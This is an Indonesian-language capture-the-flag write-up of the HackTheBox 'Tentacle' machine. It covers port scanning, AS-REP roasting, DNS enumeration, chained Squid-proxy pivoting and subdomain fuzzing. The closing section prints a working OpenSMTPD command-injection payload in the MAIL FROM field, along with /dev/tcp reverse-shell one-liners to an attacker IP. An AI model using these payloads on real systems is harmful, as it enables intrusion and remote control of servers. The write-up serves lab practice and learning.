Proxychains & DNS
Author : anonputraid

Berikut Adalah Informasi Mengenai Cara Menyelesaikan Box Meshine Tentacle Pada Hackthebox , Tujuan Catatan Informasi Seperti Ini Agar Bisa Terus Mengingat Dan Mengulang Apa Yang Telah Dipelajari Sebelum Nya.
Starting point (Foothold Section)
Port Scan :
nmap -sV -sC -sT 10.10.10.224 -oN nmap.scan
Output :
3128/tcp open http-proxy Squid http proxy 4.11
|_http-server-header: squid/4.11
|_http-title: ERROR: The requested URL could not be retrieved
Scan Nmap menunjukkan 3128 port
. Yang merupakan Proxy squid. Juga membuka 10.10.10.224:3128
memberi kami dua informasi. nama pengguna [email protected]
dan subdomain srv01.realcorp.htb
.
Generate Hash Brute Keyberos :
Menjalankan pemanggangan AS-REP untuk nama pengguna tersebut memberi kami hash yang merupakan ** RABBIT HOLE **:
Download Script Disini : GetNPUser.py
./GetNPUsers.py -dc-ip REALCORP.HTB REALCORP.HTB/j.nakazawa -no-pass -format hashcat | tee kerbrute-hash
Find Domain Using DNS :
Sekarang menjalankan Enum DNS kita bisa mendapatkan 3 host:
Downloads Wordlists DIsini : Subdomain Top 1 Million 110000
dnsenum --threads 64 --dnsserver 10.10.10.224 -f /usr/share/wordlists/DNS/subdomains-top1million-110000.txt realcorp.htb
Output :
ns.realcorp.htb. 259200 IN A 10.197.243.77
proxy.realcorp.htb. 259200 IN CNAME ns.realcorp.htb.
ns.realcorp.htb. 259200 IN A 10.197.243.77
wpad.realcorp.htb. 259200 IN A 10.197.243.31
ns.realcorp.htb. 259200 IN A 10.197.243.77
Tetapi tidak ada IP internal yang dapat diakses. Jadi kami menambahkan proxy di proxychain kami lalu menjalankan nmap di 127.0.0.1 dan hasilnya memiliki port yang sama kecuali sekarang port baru Kpasswd5.
sudo nano /etc/proxychains4.conf
Tambahkan http 10.10.10.224 3128
Lalu Jalankan Perintah Berikut Ini :
proxychains nmap -sT --min-rate 1000 -sC -sV -v -oN pivoted_77 127.0.0.1
Tetapi dari sana juga kami tidak dapat mengakses IP apa pun, jadi mungkin proxy tidak menyukai lalu lintas masuk. Jadi kami menambahkan entri lain di proxychain kami untuk merutekan paket melalui 10.10.10.224:3128 -> 127.0.0.1:3128
. Tapi kemudian tiba-tiba IP 10.197.243.77
dapat diakses.
sudo nano /etc/proxychains4.conf
Tambahkan http 10.10.10.224 3128
Tambahkan http 127.0.0.1 3128
Lalu Setelah Itu Jalankan Perintah Berikut :
proxychains nmap -sT --min-rate 1000 -sC -sV -v -oN pivoted_77 10.197.243.77
Sekarang, di sini juga kami memiliki port squid 3128, dengan menambahkan proxy ini lagi sekarang kami mendapat IP lain 10.197.243.31
menjadi dapat Diakses dan membuka port 80. Jalankan Perintah Berikut :
Tambahkan :
http 10.197.243.77 3128
proxychains nmap -sT --min-rate 1000 -sC -sV -v -oN pivoted_77 10.197.243.31
Sekarang kami menjalankan WFUZZ untuk semua subdomain atau Dirbuster. Dirbuster tidak membuat apa-apa kecuali Subdomain enumeration memberi saya subdomain wpad.
Download Wordlists Disini : Subdomain Top 1 Million 20000
proxychains4 -q wfuzz -t64 -c -z file,/usr/share/wordlists/DNS/subdomains-top1million-20000.txt -H "Host: FUZZ.realcorp.htb" --hh 4057 http://10.197.243.31/ | tee wfuzz.scan
Lalu Tambahkan Domain :
wpad.realcorp.htb
Sekarang wpad adalah petunjuk yang sangat kuat bahwa itu adalah subdomain wpad sehingga kami mendapatkan file wpad.dat yang merupakan file konfigurasi default :
sudo proxychains curl http://wpad.realcorp.htb/wpad.dat
Ouput :
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.14
[proxychains] Strict chain ... 10.10.10.224:3128 ... 127.0.0.1:3128 ... 10.197.243.77:3128 ... 10.197.243.31:80 ... OK
function FindProxyForURL(url, host) {
if (dnsDomainIs(host, "realcorp.htb"))
return "DIRECT";
if (isInNet(dnsResolve(host), "10.197.243.0", "255.255.255.0"))
return "DIRECT";
return "PROXY proxy.realcorp.htb:3128";
}
Jadi, kita sudah mengetahui domain 10.197.243.0
, sekarang kita perlu memeriksa 10.241.251.0
. Yang mana saya berlari nampan terhadap seluruh /24 oktet dengan port teratas dan melihat bahwa 10.241.251.113
memiliki port SMTP terbuka dan menjalankan OpenSMTPD.
proxychains nmap -sT --min-rate 2500 -Pn 10.241.251.0/24
proxychains nmap -sT -sC -sV --min-rate 2500 -Pn 10.241.251.113
proxychains nmap -sT -sC -sV -p 25 -Pn 10.241.251.113
Output :
PORT STATE SERVICE VERSION
25/tcp open smtp OpenSMTPD
| smtp-commands: smtp.realcorp.htb Hello nmap.scanme.org [10.241.251.1], pleased to meet you, 8BITMIME, ENHANCEDSTATUSCODES, SIZE 36700160, DSN, HELP,
|_ 2.0.0 This is OpenSMTPD 2.0.0 To report bugs in the implementation, please contact [email protected] 2.0.0 with full details 2.0.0 End of HELP inf o
Service Info: Host: smtp.realcorp.htb
kami melihat bahwa RCPT TO default: <root>
tidak berfungsi jadi kami mengubah ke RCPT TO: <[email protected]>
sebagai gantinya dan viola, kami memiliki shell terbalik. Sekarang :
sudo proxychains nc 10.241.251.113 25
HELO hacktivity
MAIL FROM:<;for d in x t J z 5 o N G K 9 3 B 1 n Y;do read d;done;bash;exit 0;>
RCPT TO:<[email protected]>
DATA
#
#
#
#
#
#
#
#
#
#
#
#
#
#
#
0<&95-;exec 95<>/dev/tcp/10.10.14.27/1337;sh <&95 >&95 2>&95
Lalu Lakukan Ini :
bash -c 'exec bash -i &>/dev/tcp/10.10.14.27/1334 <&1'
Last updated
Was this helpful?